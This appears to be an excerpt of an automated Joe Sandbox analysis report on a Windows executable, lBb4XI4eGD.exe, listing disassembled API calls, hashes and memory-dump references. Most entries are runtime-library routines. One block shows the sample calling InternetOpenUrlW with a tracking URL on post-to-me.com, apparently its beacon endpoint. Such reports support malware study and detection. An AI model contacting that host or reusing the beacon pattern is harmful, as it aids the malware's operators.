                                                                                                                                                                                                                                • API String ID: 2357751836-0
                                                                                                                                                                                                                                • Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                                                                                                                                                • Instruction ID: 3210944159f0fc98eb109693a3395d5946c9c878d3acb397b58b4dcf5ef0325c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E72171B5A0031AAFCB10DF65DD459AFFBB8FF48741B104036EA02E3290D7759901CBA8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 02145099
                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 021450AD
                                                                                                                                                                                                                                  • Part of subcall function 0214BDA4: __EH_prolog3_GS.LIBCMT ref: 0214BDAB
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 02145112
                                                                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 02145121
                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02145131
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1844465188-0
                                                                                                                                                                                                                                • Opcode ID: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                                                                                                                                                                                • Instruction ID: 16870aaf2660c5995b3ee85ba66267bc34be24c5941db00cb8417de1801714f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3621A971991308EFEB10EFA4D494B9CBBB2BF60B11F50811AD489AB281DFB49944CF91
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(0214DACD,0214DACD,00000002,0216ED25,02173941,00000000,?,021669F5,00000002,00000000,00000000,00000000,?,0214CF7E,0214DACD,00000004), ref: 021721BA
                                                                                                                                                                                                                                • _free.LIBCMT ref: 021721EF
                                                                                                                                                                                                                                • _free.LIBCMT ref: 02172216
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,0214DACD), ref: 02172223
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,0214DACD), ref: 0217222C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                • Instruction ID: 3772d60ee325f7917a0bd12a3d4bb9d534ee5ef396d3863eb58615110f494246
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 460149365C56007FC31627246C44E1B267EFBD6B72B510128FC2592290EF71C9038525
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431F88
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431FAF
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431FC5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                • Instruction ID: e50af596af166b8a3d4a0e4732677f958598b7c5f443a1734cc3cd8306247ad3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7014936609A003BD3122B315C45D2B266DABD977AF21212FF805933E2EB2C8902512D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,0216A9DC,?,00000000,?,0216CDD6,02142474,00000000,?,00451F20), ref: 02172135
                                                                                                                                                                                                                                • _free.LIBCMT ref: 02172168
                                                                                                                                                                                                                                • _free.LIBCMT ref: 02172190
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0217219D
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021721A9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                • Instruction ID: d5fedbe0aae0212d5cb74c1206f7714d51929fc560d53cb4cc5507a23f683bd8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F044365C5B007FD2163724AC09B1F267AAFC2B63F650228FE14922A0EF758617956A
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                • Instruction ID: 142cfc1d6fefe371a65853cee7fca9c099a37b51f1b4623e9e727693a4b19c8f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49F02D3A508A0037D61637266C06B1B2A19AFD9B27F31112FF814D33F2EF2DC802452D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02152994: TlsGetValue.KERNEL32(?,?,02150DB2,02152EBF,00000000,?,02150D90,?,?,?,00000000,?,00000000), ref: 0215299A
                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02157BA1
                                                                                                                                                                                                                                  • Part of subcall function 0216120A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02161231
                                                                                                                                                                                                                                  • Part of subcall function 0216120A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0216124A
                                                                                                                                                                                                                                  • Part of subcall function 0216120A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021612C0
                                                                                                                                                                                                                                  • Part of subcall function 0216120A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021612C8
                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02157BAF
                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02157BB9
                                                                                                                                                                                                                                • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02157BC3
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02157BE1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4266703842-0
                                                                                                                                                                                                                                • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                • Instruction ID: e67f00726459adf92aee201fc88f4ba18e54091d499b21789b79727c5e0b1842
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17F0F631640638EFCB25B775981596EF72B9F80B15B0041AADC3153290DF759A568FC1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0041272D: TlsGetValue.KERNEL32(?,?,00410B4B,00412C58,00000000,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412733
                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041793A
                                                                                                                                                                                                                                  • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FCA
                                                                                                                                                                                                                                  • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FE3
                                                                                                                                                                                                                                  • Part of subcall function 00420FA3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421059
                                                                                                                                                                                                                                  • Part of subcall function 00420FA3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421061
                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417948
                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417952
                                                                                                                                                                                                                                • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041795C
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041797A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4266703842-0
                                                                                                                                                                                                                                • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                • Instruction ID: 571f4fa900913ae9ac1b624b88cebae7c96a5b4968f9dadd54c27da6e91ea8e9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F0F671A0421467CA15B737A8529EEB7669F90764B40012FF41193292DFAC9E9886CD
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A0B4
                                                                                                                                                                                                                                  • Part of subcall function 021736C1: HeapFree.KERNEL32(00000000,00000000,?,0217A34F,?,00000000,?,00000000,?,0217A5F3,?,00000007,?,?,0217A9E7,?), ref: 021736D7
                                                                                                                                                                                                                                  • Part of subcall function 021736C1: GetLastError.KERNEL32(?,?,0217A34F,?,00000000,?,00000000,?,0217A5F3,?,00000007,?,?,0217A9E7,?,?), ref: 021736E9
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A0C6
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A0D8
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A0EA
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A0FC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                • Instruction ID: 0f7bab7b1e8f8d93494b27fb766635a9542cc2bd06388fac44a4e38162b2e8be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F03672985300AB8724EB54F9C2C1E77FABE847157640D95F058D7721CB31FC909A99
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00439E4D
                                                                                                                                                                                                                                  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00439E5F
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00439E71
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00439E83
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00439E95
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                • Instruction ID: d2eb3a6f69ed6479eb379d103aeec45d7d0be428363b37fe18b93f123c88dda9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2F04F32905300A7A621EF59E487C1773D9BB08712F68694BF00CD7751CB79FC808A5D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217199F
                                                                                                                                                                                                                                  • Part of subcall function 021736C1: HeapFree.KERNEL32(00000000,00000000,?,0217A34F,?,00000000,?,00000000,?,0217A5F3,?,00000007,?,?,0217A9E7,?), ref: 021736D7
                                                                                                                                                                                                                                  • Part of subcall function 021736C1: GetLastError.KERNEL32(?,?,0217A34F,?,00000000,?,00000000,?,0217A5F3,?,00000007,?,?,0217A9E7,?,?), ref: 021736E9
                                                                                                                                                                                                                                • _free.LIBCMT ref: 021719B1
                                                                                                                                                                                                                                • _free.LIBCMT ref: 021719C4
                                                                                                                                                                                                                                • _free.LIBCMT ref: 021719D5
                                                                                                                                                                                                                                • _free.LIBCMT ref: 021719E6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                • Instruction ID: 2bcacda4f0d6d81732cdff2c030d12b3ef57e5ed747a1fb7d396d9238e04fbda
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABF0BDB1C40310AF9F216F14BC804047B71AF5972271112A6F41697372C735EA66EFDE
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0215CF26
                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0215CF57
                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0215CF60
                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0215CF73
                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0215CF7C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2583373041-0
                                                                                                                                                                                                                                • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                • Instruction ID: 137cfae6740bbc41651cb5e01710393ebd48b2cea2326ce80bac00b374b9fe4b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07F08C36280620DFCA29EF60F9508AB73B6AFC461030009DEE8A607560CF21A946DB62
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431738
                                                                                                                                                                                                                                  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043174A
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043175D
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043176E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043177F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                • Instruction ID: 641b2a1348aedb00c037ff60dfb94c9ddf1ba1fe668fd8dfad71f65212485368
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F03070C003109BAA236F15AC414053B60BF2D727B15626BF40697273CB38D952DF8E
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCBF
                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CCF0
                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0041CCF9
                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD0C
                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD15
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2583373041-0
                                                                                                                                                                                                                                • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                • Instruction ID: c05db364d3e23aa36edd3e4f9db1c19a47e3778ae9c6089a54b2af47d917b565
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF0A776240500AB8625FF22F9518F77776EFC4715310091EE44B07651DF29ADC2DB6A
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02142E84
                                                                                                                                                                                                                                  • Part of subcall function 02141321: _wcslen.LIBCMT ref: 02141328
                                                                                                                                                                                                                                  • Part of subcall function 02141321: _wcslen.LIBCMT ref: 02141344
                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 02143097
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InternetOpen_wcslen
                                                                                                                                                                                                                                • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                • API String ID: 3381584094-4083784958
                                                                                                                                                                                                                                • Opcode ID: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                                                                                                                                                • Instruction ID: c7918b7a48ec7a09e570406413b6b96160d7b73d043d91a8d0727c5b0d08fe29
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B515295A65344A9E320EFB0BC55B3633B8FF58712F10543AE528CB2B2E7B19944C71E
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434464
                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434479
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                • String ID: BC$BC
                                                                                                                                                                                                                                • API String ID: 885266447-2490606219
                                                                                                                                                                                                                                • Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                                                                                                                                                • Instruction ID: b88449fc46bca28f45784ded13f8a3cce66366d25dc88dae471b8c9c35daa9d8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61518F71A00208AFCB14DF59C884AAEBBB2EFD8314F19C26AE81897361D775ED51CB44
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\lBb4XI4eGD.exe,00000104), ref: 0216F9AA
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0216FA75
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0216FA7F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\lBb4XI4eGD.exe
